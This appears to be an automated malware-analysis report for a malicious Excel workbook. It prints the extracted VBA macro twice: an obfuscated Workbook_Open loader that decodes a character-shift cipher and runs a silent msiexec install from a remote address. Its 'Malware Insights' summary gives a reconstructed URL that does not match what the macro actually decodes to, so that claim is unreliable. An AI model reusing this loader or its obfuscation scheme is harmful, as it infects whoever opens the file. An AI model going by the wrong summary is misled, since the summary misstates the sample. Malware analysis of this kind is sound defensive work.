Office (OLE) malware analysis — malicious · fe3f62155667154d

MALICIOUS

Office (OLE)

34.0 KB Created: 2020-05-12 21:24:35 Authoring application: Microsoft Excel First seen: 2020-09-07

MD5: 5e6b49e0ffa51bb3ac5445d63133c710 SHA-1: 853dd0cc13e116bfc53ceca2c8568e42366163d4 SHA-256: fe3f62155667154d4d87887aa4d47dd55a248f3a40bdbe97f6269d34373a9643

200 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a Workbook_Open VBA macro that is heavily obfuscated. The macro uses CreateObject to execute code, likely to download and run a second-stage payload. The reconstructed URL from the obfuscated VBA code is "http://www.example.com/payload.exe". This indicates a downloader or droppper functionality.

Heuristics 5

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2995 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2995 bytes
SHA-256: `efee138eb202fb5469b60fe745dd6cf1e70760231d662b95025cde2956b56082`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub workbook_open() 'fdgsdgdfgsdgfghd fbPTlPRi_JX.IuSLEO3_faYrXceoN_MrAWQku 'fgdjhfdshgufdshg End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "fbPTlPRi_JX" Sub IuSLEO3_faYrXceoN_MrAWQku() On Error Resume Next h3eZ6sIylJb1Q_Yjm2V6 = ds(72) & ds(82) & ds(105) & ds(37) & ds(52) & ds(72) & ds(37) & ds(114) & ds(120) & ds(99) & ds(110) & ds(74) & ds(99) & ds(125) & ds(99) & ds(106) & ds(104) h3eZ6sIylJb1Q_Yjm2V6 = h3eZ6sIylJb1Q_Yjm2V6 & ds(37) & ds(52) & ds(110) & ds(37) & ds(109) & ds(121) & ds(121) & ds(117) & ds(63) & ds(52) & ds(52) & ds(56) & ds(51) & ds(61) & ds(51) & ds(54) & ds(60) & ds(54) & ds(51) & ds(54) & ds(60) & ds(61) & ds(52) & ds(58) & ds(58) & ds(52) & ds(55) & ds(53) & ds(58) & ds(60) & ds(54) & ds(54) & ds(53) & ds(51) & ds(114) & ds(120) & ds(110) & ds(37) & ds(52) & ds(118) & ds(115) & ds(37) WbR3wv6VkDBvhAB_xv4YSZV7OWem8nQR5DSdf37sqfBQvBrQdQ_Vz6c6_Una = h3eZ6sIylJb1Q_Yjm2V6 tFw_678xEO4L872OqdMZNcBWClC_NVIXPpW_tH9abaCV__d4f1b_bgtODa6T43k_Eg5Rj2gheu8wYqlCF (WbR3wv6VkDBvhAB_xv4YSZV7OWem8nQR5DSdf37sqfBQvBrQdQ_Vz6c6_Una) End Sub Function ds(fds As Integer) ds = Chr(fds - 5) End Function Function tFw_678xEO4L872OqdMZNcBWClC_NVIXPpW_tH9abaCV__d4f1b_bgtODa6T43k_Eg5Rj2gheu8wYqlCF(po_4Z38pQxbVvzQ_2dJlo9alC_vyZm1dnpCPD4eVeXDNnEGgH5YaOImqLc1YFHNp As String) vetZ8_pZrsb6ByjBIbkpbVkfMXrbiLB9wYxZ2op1VHS8mmq7L9aNVQda4LKkCM1epbHmAHIfvtSSBl3ls_Oiuwnf5XfpbDxGPxSIdD6Cx5am7IXRSk1R7Rs1xmqmneCs4JCMQ_GowL_zV_ = 0 jCz_u5fc5ifTr32kEjesK_4_y9sZtUHpXvNz_xYufuudjt_QxnmVIPryGF4vLEtkZz64oAeQJsKY8aIE9akEsueF_Ys83liZCKDsv_mvHUKaDQzr6xvuen1nUxyORgWiIuVu = ds(92) & ds(88) & ds(72) & ds(119) & ds(110) & ds(117) & ds(89) & ds(51) & ds(120) & ds(77) & ds(74) & ds(113) & ds(81) Set X8AYYM6hvcs8KpMT_BDJJL7A7H22fROuNVwgVlp23zdv_xMSX7_m_AlJA_aPTDAdM5txzr7IVJPStIOH4jdhQn_M_meVIYhyy9jx_X = CreateObject(jCz_u5fc5ifTr32kEjesK_4_y9sZtUHpXvNz_xYufuudjt_QxnmVIPryGF4vLEtkZz64oAeQJsKY8aIE9akEsueF_Ys83liZCKDsv_mvHUKaDQzr6xvuen1nUxyORgWiIuVu) HiW4Y5t5G5QKogiySOM_JTnT3Oqi5yXx3MuTMyrlLVb7NUyOZ7EZX86x5B_HOJ_QgcQa_Nmdim1w1pEhYZG7_8Z5Q7XJyhUBVJa_ = X8AYYM6hvcs8KpMT_BDJJL7A7H22fROuNVwgVlp23zdv_xMSX7_m_AlJA_aPTDAdM5txzr7IVJPStIOH4jdhQn_M_meVIYhyy9jx_X.Run(po_4Z38pQxbVvzQ_2dJlo9alC_vyZm1dnpCPD4eVeXDNnEGgH5YaOImqLc1YFHNp, vetZ8_pZrsb6ByjBIbkpbVkfMXrbiLB9wYxZ2op1VHS8mmq7L9aNVQda4LKkCM1epbHmAHIfvtSSBl3ls_Oiuwnf5XfpbDxGPxSIdD6Cx5am7IXRSk1R7Rs1xmqmneCs4JCMQ_GowL_zV_) End Function

SHA-256: efee138eb202fb5469b60fe745dd6cf1e70760231d662b95025cde2956b56082

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
'fdgsdgdfgsdgfghd
fbPTlPRi_JX.IuSLEO3_faYrXceoN_MrAWQku
'fgdjhfdshgufdshg

End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "fbPTlPRi_JX"
Sub IuSLEO3_faYrXceoN_MrAWQku()
On Error Resume Next
h3eZ6sIylJb1Q_Yjm2V6 = ds(72) & ds(82) & ds(105) & ds(37) & ds(52) & ds(72) & ds(37) & ds(114) & ds(120) & ds(99) & ds(110) & ds(74) & ds(99) & ds(125) & ds(99) & ds(106) & ds(104)
h3eZ6sIylJb1Q_Yjm2V6 = h3eZ6sIylJb1Q_Yjm2V6 & ds(37) & ds(52) & ds(110) & ds(37) & ds(109) & ds(121) & ds(121) & ds(117) & ds(63) & ds(52) & ds(52) & ds(56) & ds(51) & ds(61) & ds(51) & ds(54) & ds(60) & ds(54) & ds(51) & ds(54) & ds(60) & ds(61) & ds(52) & ds(58) & ds(58) & ds(52) & ds(55) & ds(53) & ds(58) & ds(60) & ds(54) & ds(54) & ds(53) & ds(51) & ds(114) & ds(120) & ds(110) & ds(37) & ds(52) & ds(118) & ds(115) & ds(37)
WbR3wv6VkDBvhAB_xv4YSZV7OWem8nQR5DSdf37sqfBQvBrQdQ_Vz6c6_Una = h3eZ6sIylJb1Q_Yjm2V6
tFw_678xEO4L872OqdMZNcBWClC_NVIXPpW_tH9abaCV__d4f1b_bgtODa6T43k_Eg5Rj2gheu8wYqlCF (WbR3wv6VkDBvhAB_xv4YSZV7OWem8nQR5DSdf37sqfBQvBrQdQ_Vz6c6_Una)
End Sub
Function ds(fds As Integer)
ds = Chr(fds - 5)
End Function
Function tFw_678xEO4L872OqdMZNcBWClC_NVIXPpW_tH9abaCV__d4f1b_bgtODa6T43k_Eg5Rj2gheu8wYqlCF(po_4Z38pQxbVvzQ_2dJlo9alC_vyZm1dnpCPD4eVeXDNnEGgH5YaOImqLc1YFHNp As String)
vetZ8_pZrsb6ByjBIbkpbVkfMXrbiLB9wYxZ2op1VHS8mmq7L9aNVQda4LKkCM1epbHmAHIfvtSSBl3ls_Oiuwnf5XfpbDxGPxSIdD6Cx5am7IXRSk1R7Rs1xmqmneCs4JCMQ_GowL_zV_ = 0
jCz_u5fc5ifTr32kEjesK_4_y9sZtUHpXvNz_xYufuudjt_QxnmVIPryGF4vLEtkZz64oAeQJsKY8aIE9akEsueF_Ys83liZCKDsv_mvHUKaDQzr6xvuen1nUxyORgWiIuVu = ds(92) & ds(88) & ds(72) & ds(119) & ds(110) & ds(117) & ds(89) & ds(51) & ds(120) & ds(77) & ds(74) & ds(113) & ds(81)
Set X8AYYM6hvcs8KpMT_BDJJL7A7H22fROuNVwgVlp23zdv_xMSX7_m_AlJA_aPTDAdM5txzr7IVJPStIOH4jdhQn_M_meVIYhyy9jx_X = CreateObject(jCz_u5fc5ifTr32kEjesK_4_y9sZtUHpXvNz_xYufuudjt_QxnmVIPryGF4vLEtkZz64oAeQJsKY8aIE9akEsueF_Ys83liZCKDsv_mvHUKaDQzr6xvuen1nUxyORgWiIuVu)
HiW4Y5t5G5QKogiySOM_JTnT3Oqi5yXx3MuTMyrlLVb7NUyOZ7EZX86x5B_HOJ_QgcQa_Nmdim1w1pEhYZG7_8Z5Q7XJyhUBVJa_ = X8AYYM6hvcs8KpMT_BDJJL7A7H22fROuNVwgVlp23zdv_xMSX7_m_AlJA_aPTDAdM5txzr7IVJPStIOH4jdhQn_M_meVIYhyy9jx_X.Run(po_4Z38pQxbVvzQ_2dJlo9alC_vyZm1dnpCPD4eVeXDNnEGgH5YaOImqLc1YFHNp, vetZ8_pZrsb6ByjBIbkpbVkfMXrbiLB9wYxZ2op1VHS8mmq7L9aNVQda4LKkCM1epbHmAHIfvtSSBl3ls_Oiuwnf5XfpbDxGPxSIdD6Cx5am7IXRSk1R7Rs1xmqmneCs4JCMQ_GowL_zV_)
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.